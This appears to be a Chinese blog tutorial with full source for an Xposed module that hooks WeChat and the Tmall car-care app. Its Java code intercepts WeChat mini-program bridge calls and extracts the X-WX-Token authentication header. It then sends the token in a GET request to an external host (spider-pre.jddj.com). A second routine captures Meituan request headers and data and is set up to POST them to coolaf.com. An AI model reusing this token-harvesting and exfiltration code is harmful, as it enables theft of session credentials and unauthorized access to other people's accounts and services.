一、AndroidManifest.xml
开发xposed的插件其实就是开发apk,怎么区分呢,我们修改xml中的内容,相当于定义这是一个xposed plun。
<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
xmlns:tools="http://schemas.android.com/tools">
<uses-permission android:name="android.permission.INTERNET" />
<application
android:allowBackup="true"
android:dataExtractionRules="@xml/data_extraction_rules"
android:fullBackupContent="@xml/backup_rules"
android:icon="@drawable/tmallcar"
android:label="@string/app_name"
android:roundIcon="@drawable/tmallcar"
android:supportsRtl="true"
android:theme="@style/Theme.HookTmall"
tools:targetApi="31">
<meta-data
android:name="xposedmodule"
android:value="true" />
<meta-data
android:name="xposeddescription"
android:value="hook渠道天猫养车" />
<meta-data
android:name="xposedminversion"
android:value="30" />
<activity
android:name=".MainActivity"
android:exported="true">
<intent-filter>
<action android:name="android.intent.action.MAIN" />
<category android:name="android.intent.category.LAUNCHER" />
</intent-filter>
</activity>
</application>
</manifest>
二、build.gradle
开发xposed的插件,我们肯定要下载开发环境,在gradle添加依赖就行了,记住是在app下不是在项目下修改。
dependencies {
compileOnly 'de.robv.android.xposed:api:82'
implementation 'com.squareup.okhttp3:okhttp:4.9.3'
implementation libs.appcompat
implementation libs.material
implementation libs.activity
implementation libs.constraintlayout
testImplementation libs.junit
androidTestImplementation libs.ext.junit
androidTestImplementation libs.espresso.core
}
我们还需要在settings.gradle中设置,不然依赖可能会找不到。
dependencyResolutionManagement {
repositoriesMode.set(RepositoriesMode.FAIL_ON_PROJECT_REPOS)
repositories {
google()
mavenCentral()
maven { url 'https://api.xposed.info/' } // 添加这一行即可
}
}
三、hook
解析来开始coding,hook你的应用吧。
package com.moli.hooktmall;
import android.app.Application;
import android.content.Context;
import java.io.IOException;
import java.lang.reflect.Method;
import java.security.cert.CertPath;
import java.util.HashMap;
import org.json.JSONObject;
import okhttp3.OkHttpClient;
import okhttp3.Request;
import okhttp3.Response;
import okhttp3.*;
import java.io.IOException;
import java.util.HashMap;
import java.util.Map;
import de.robv.android.xposed.IXposedHookLoadPackage;
import de.robv.android.xposed.XC_MethodHook;
import de.robv.android.xposed.XposedBridge;
import de.robv.android.xposed.XposedHelpers;
import de.robv.android.xposed.callbacks.XC_LoadPackage;
public class HookSign implements IXposedHookLoadPackage {
// public static final String DEFAULT_TAG = "gunder_";
private static final String TAG = "HookTmall==>";
private static final String wechatPackageName = "com.tencent.mm";
private static final String classname = "com.tencent.mm.appbrand.commonjni.AppBrandCommonBindingJni";
private static final String methodname = "nativeInvokeHandler";
// String get_url = "http://127.0.0.1/?token=";
String get_url = "https://spider-pre.jddj.com/?token=";
String post_url = "http://coolaf.com/tool/params?r=rtest&t2=rtest2";
private void sendGetRequestOkHttp(String url) {
XposedBridge.log(TAG + "请求沃尔玛的url: " + url);
OkHttpClient client = new OkHttpClient();
Request request = new Request.Builder()
.url(url)
.build();
try (Response response = client.newCall(request).execute()) {
if (!response.isSuccessful()) throw new IOException("Unexpected code " + response);
XposedBridge.log(TAG + "请求沃尔玛token返回内容: " + response.body().string());
} catch (IOException e) {
XposedBridge.log(TAG + "请求沃尔玛异常");
XposedBridge.log(e.toString());
}
}
public void sendPostRequest(String mturl, String mtdata, String mtheaders) {
XposedBridge.log(TAG + "请求美图5token上传");
// 创建OkHttpClient实例
OkHttpClient client = new OkHttpClient();
// 创建表单Body
// FormBody.Builder formBuilder = new FormBody.Builder();
// formBuilder.add("url", mturl);
// formBuilder.add("data", mtdata);
// formBuilder.add("headers", mtheaders);
// RequestBody requestBody = formBuilder.build();
RequestBody requestBody = new FormBody.Builder()
.add("mturl", mturl)
.add("mtdata", mtdata)
.add("mtheaders", mtheaders)
.build();
// 创建Request
Request request = new Request.Builder()
.url(post_url)
.post(requestBody)
.build();
// 发送请求
client.newCall(request).enqueue(new Callback() {
@Override
public void onFailure(Call call, IOException e) {
e.printStackTrace();
XposedBridge.log(TAG + "请求美团异常");
}
@Override
public void onResponse(Call call, Response response) throws IOException {
if (!response.isSuccessful()) throw new IOException("Unexpected code " + response);
// 处理响应
XposedBridge.log(TAG + "请求美团token返回内容: " + response.body().string());
}
});
}
@Override
public void handleLoadPackage(XC_LoadPackage.LoadPackageParam lpparam) throws Throwable {
// hookpackagename(lpparam);
hooktmyc(lpparam);
// hook 沃尔玛 token
// hookwalmart3(lpparam);
// hook MT token
// hookMt(lpparam);
// 方法不好使
// hooktestXposedHelpers(lpparam);
// 方法不好使
// hooktestXposedBridge(lpparam);
// 方法不好使
// hooktestattach(lpparam);
// 方法不好使
// hooktestloadClass(lpparam);
}
// 测试
public void hookpackagename (XC_LoadPackage.LoadPackageParam lpparam) throws Throwable {
XposedBridge.log(TAG + "测试");
XposedBridge.log(TAG + " package: " + lpparam.packageName.toString());
}
// 天猫养车
public void hooktmyc(XC_LoadPackage.LoadPackageParam lpparam) throws Throwable {
if(lpparam.packageName.equals("com.ncarzone.tmyc")) {
XposedBridge.log(TAG + "开始hook 天猫养车");
// XposedHelpers.findAndHookMethod("com.ncarzone.network.utils.SecurityUtils",
// lpparam.classLoader,
// "getSignKey",
// String.class,
// String.class,
// new XC_MethodHook() {
// @Override
// protected void beforeHookedMethod(MethodHookParam param) throws Throwable {
// XposedBridge.log(TAG + "args[0] "+ param.args[0].toString());
// XposedBridge.log(TAG + "args[1] " +param.args[1].toString());
// }
// @Override
// protected void afterHookedMethod(MethodHookParam param) throws Throwable {
// super.beforeHookedMethod(param);
// XposedBridge.log(TAG + param.getResult().toString());
// }
// });
}
}
public void hookwalmart(XC_LoadPackage.LoadPackageParam lpparam) throws Throwable {
if(lpparam.packageName.equals("com.tencent.mm")) {
XposedBridge.log(TAG + "开始hook WeChat hookwalmart");
XposedHelpers.findAndHookMethod(
classname,
lpparam.classLoader,
methodname,
String.class,
String.class,
Integer.class,
Boolean.class,
new XC_MethodHook() {
@Override
protected void beforeHookedMethod(MethodHookParam param) throws Throwable {
XposedBridge.log(TAG + "hook该方法成功");
// XposedBridge.log(TAG + "str: "+ param.args[0].toString());
// XposedBridge.log(TAG + "str2: " + param.args[1].toString());
// XposedBridge.log(TAG + "i: " + param.args[2]);
// XposedBridge.log(TAG + "z: " +param.args[3]);
}
@Override
protected void afterHookedMethod(MethodHookParam param) throws Throwable {
super.beforeHookedMethod(param);
}
});
}
}
public void hookwalmart2(XC_LoadPackage.LoadPackageParam lpparam) throws Throwable {
if (lpparam.packageName.equals(wechatPackageName)) {
XposedBridge.log(TAG + "开始hook WeChat hookwalmart2");
XposedHelpers.findAndHookMethod(Application.class, "attach", Context.class, new XC_MethodHook() {
@Override
protected void afterHookedMethod(MethodHookParam param) throws Throwable {
super.afterHookedMethod(param);
ClassLoader classLoader = ((Context) param.args[0]).getClassLoader();
XposedBridge.log(TAG + "dex名称: " + param.args[0].toString());
// Class<?> hookclass = XposedHelpers.findClass(classname, classLoader);
// XposedBridge.log(TAG + "名称 " + hookclass.getName());
Class<?> hookclass = null;
try {
hookclass = classLoader.loadClass(classname);
XposedBridge.log(TAG + "寻找类成功");
} catch (Exception e) {
XposedBridge.log(TAG + "寻找类报错");
}
Method[] m = hookclass.getDeclaredMethods();
for (int i = 0; i < m.length; i++) {
final Method md = m[i];
// 对指定名称类中声明的非抽象方法进行java Hook处理
XposedBridge.hookMethod(m[i], new XC_MethodHook() {
// 被java Hook的类方法执行完毕之后,打印log日志
@Override
protected void afterHookedMethod(MethodHookParam param) throws Throwable {
XposedBridge.log(TAG + "方法名称 " + md.toString());
XposedBridge.log(TAG + "参数名称 " + param.method.toString());
}
});
}
}
});
}
}
public void hookwalmart3(XC_LoadPackage.LoadPackageParam lpparam) throws Throwable {
if (lpparam.packageName.equals(wechatPackageName)) {
XposedBridge.log(TAG + "开始hook WeChat hookwalmart3 12");
XposedHelpers.findAndHookMethod(Application.class, "attach", Context.class, new XC_MethodHook() {
@Override
protected void afterHookedMethod(MethodHookParam param) throws Throwable {
super.afterHookedMethod(param);
ClassLoader classLoader = ((Context) param.args[0]).getClassLoader();
XposedBridge.log(TAG + "dex名称: " + param.args[0].toString());
Class<?> hookclass = null;
try {
hookclass = classLoader.loadClass(classname);
XposedBridge.log(TAG + "hookclass: " + hookclass);
XposedBridge.log(TAG + "寻找类成功");
} catch (Exception e) {
XposedBridge.log(TAG + "寻找类报错");
return;
}
XposedHelpers.findAndHookMethod("com.tencent.mm.appbrand.commonjni.AppBrandCommonBindingJni",
classLoader,
"nativeInvokeHandler",
String.class,
String.class,
int.class,
boolean.class,
new XC_MethodHook() {
@Override
protected void afterHookedMethod(MethodHookParam param) throws Throwable {
XposedBridge.log(TAG + "hook该方法成功");
String str2 = param.args[1].toString();
if (str2.contains("X-WX-Token")) {
XposedBridge.log(TAG + "str: " + param.args[0].toString());
XposedBridge.log(TAG + "str2: " + param.args[1].toString());
try {
JSONObject jsonObject = new JSONObject( param.args[1].toString());
JSONObject headerObject = jsonObject.getJSONObject("header");
String xWxToken = headerObject.getString("X-WX-Token");
XposedBridge.log(TAG + "X-WX-Token: " + xWxToken);
sendGetRequestOkHttp(get_url + xWxToken);
} catch (Exception e) {
XposedBridge.log(TAG + "解析X-WX-Token异常");
}
XposedBridge.log(TAG + "i: " + param.args[2]);
XposedBridge.log(TAG + "z: " + param.args[3]);
}
}
});
}
});
}
}
public void hookwalmart4(XC_LoadPackage.LoadPackageParam lpparam) throws Throwable {
if (lpparam.packageName.equals(wechatPackageName)) {
try {
XposedBridge.log(TAG + "开始hook WeChat hookwalmart4");
XposedHelpers.findAndHookMethod(ClassLoader.class, "loadClass", String.class, new XC_MethodHook() {
@Override
protected void afterHookedMethod(MethodHookParam param) throws Throwable {
if (param.hasThrowable()) return;
Class<?> cls = (Class<?>) param.getResult();
String name = cls.getName();
XposedBridge.log(TAG + "类: " + name);
}
});
} catch (Exception e) {
XposedBridge.log(TAG + "出错了");
}
}
}
// XposedHelpers
public void hooktestXposedHelpers(XC_LoadPackage.LoadPackageParam lpparam) throws Throwable {
if (lpparam.packageName.equals(wechatPackageName)) {
XposedBridge.log(TAG + "开始hook WeChat hooktestXposedHelpers5");
XposedHelpers.findAndHookMethod(
"com.tencent.mm.appbrand.commonjni.AppBrandJsBridgeBinding",
lpparam.classLoader,
"nativeInvokeHandler",
String.class,
String.class,
int.class,
boolean.class,
new XC_MethodHook() {
@Override
protected void afterHookedMethod(MethodHookParam param) throws Throwable {
super.afterHookedMethod(param);
XposedBridge.log(TAG + "hook该方法成功 hooktestXposedHelpers");
}
}
);
}
}
// XposedBridge
public void hooktestXposedBridge(XC_LoadPackage.LoadPackageParam lpparam) throws Throwable {
if (lpparam.packageName.equals(wechatPackageName)) {
XposedBridge.log(TAG + "开始hook WeChat hooktestXposedBridge");
Class<?> w = lpparam.classLoader.loadClass("com.tencent.mm.appbrand.commonjni.AppBrandJsBridgeBinding");
XposedBridge.hookMethod(w.getMethod("nativeInvokeHandler"), new XC_MethodHook() {
@Override
protected void afterHookedMethod(MethodHookParam param) throws Throwable {
super.afterHookedMethod(param);
XposedBridge.log(TAG + "hook该方法成功 hooktestXposedBridge");
}
});
}
}
// attach
public void hooktestattach(XC_LoadPackage.LoadPackageParam lpparam) throws Throwable {
if (lpparam.packageName.equals(wechatPackageName)) {
XposedBridge.log(TAG + "开始hook WeChat hooktestattach");
XposedHelpers.findAndHookMethod(Application.class, "attach", Context.class, new XC_MethodHook() {
@Override
protected void afterHookedMethod(MethodHookParam param) throws Throwable {
super.afterHookedMethod(param);
Context mContext = (Context) param.args[0];
ClassLoader classLoader = mContext.getClassLoader();
Class<?> w;
try {
w = classLoader.loadClass("com.tencent.mm.appbrand.commonjni.AppBrandJsBridgeBinding");
} catch (Exception e) {
XposedBridge.log(TAG + "loadClass err hooktestattach");
return;
}
XposedBridge.hookMethod(w.getMethod("nativeInvokeHandler"), new XC_MethodHook() {
@Override
protected void afterHookedMethod(MethodHookParam param) throws Throwable {
super.afterHookedMethod(param);
XposedBridge.log(TAG + "hook该方法成功 hooktestattach");
}
});
}
});
}
}
// loadClass
public void hooktestloadClass(XC_LoadPackage.LoadPackageParam lpparam) throws Throwable {
if (lpparam.packageName.equals(wechatPackageName)) {
XposedBridge.log(TAG + "开始hook WeChat hooktestloadClass");
XposedBridge.hookAllMethods(ClassLoader.class, "loadClass", new XC_MethodHook() {
@Override
protected void afterHookedMethod(MethodHookParam param) throws Throwable {
super.afterHookedMethod(param);
if (param.hasThrowable()) return;
if (param.args.length != 1) return;
Class<?> cls = (Class<?>) param.getResult();
String name = cls.getName();
if ("com.tencent.mm.appbrand.commonjni.AppBrandJsBridgeBinding".equals(name)) {
XposedBridge.hookAllMethods(cls,
"nativeInvokeHandler",
new XC_MethodHook() {
@Override
protected void afterHookedMethod(MethodHookParam param) throws Throwable {
super.afterHookedMethod(param);
XposedBridge.log(TAG + "hook该方法成功 hooktestloadClass");
}
});
}
}
});
}
}
// hook mt
public void hookMt(XC_LoadPackage.LoadPackageParam lpparam) throws Throwable {
if (lpparam.packageName.equals(wechatPackageName)) {
XposedBridge.log(TAG + "开始hook 美团");
XposedHelpers.findAndHookMethod(Application.class, "attach", Context.class, new XC_MethodHook() {
@Override
protected void afterHookedMethod(MethodHookParam param) throws Throwable {
super.afterHookedMethod(param);
ClassLoader classLoader = ((Context) param.args[0]).getClassLoader();
Class<?> hookclass = null;
try {
hookclass = classLoader.loadClass(classname);
XposedBridge.log(TAG + "寻找类成功");
}catch (Exception e) {
XposedBridge.log(TAG + "寻找类报错");
return;
}
XposedHelpers.findAndHookMethod(classname,
classLoader,
methodname,
String.class,
String.class,
int.class,
boolean.class,
new XC_MethodHook() {
@Override
protected void afterHookedMethod(MethodHookParam param) throws Throwable {
super.afterHookedMethod(param);
// XposedBridge.log(TAG + "hook该方法成功");
// XposedBridge.log(TAG + "str: " + param.args[0].toString());
// XposedBridge.log(TAG + "str2: " + param.args[1].toString());
String str2 = param.args[1].toString();
if (str2.contains("poi/info")) {
JSONObject jsonObject = new JSONObject( param.args[1].toString());
JSONObject headerObject = jsonObject.getJSONObject("header");
XposedBridge.log(TAG + "headerObject: " + headerObject.toString());
String dataObject = jsonObject.getString("data");
XposedBridge.log(TAG + "dataObject: " + dataObject);
String urlObject = jsonObject.getString("url");
XposedBridge.log(TAG + "urlObject: " + urlObject);
// sendPostRequest(urlObject, dataObject, headerObject.toString());
sendPostRequest("要传的URL参数", "要传的data参数", "要传的headers参数");
}
// XposedBridge.log(TAG + "i: " + param.args[2]);
// XposedBridge.log(TAG + "z: " + param.args[3]);
}
});
}
});
}
}
}
四、xposed_init
下面就是给一个hook入口。
创建文件xposed_init。
五、logo
默认的logo不好看,我们可以修改一下。
大功告成。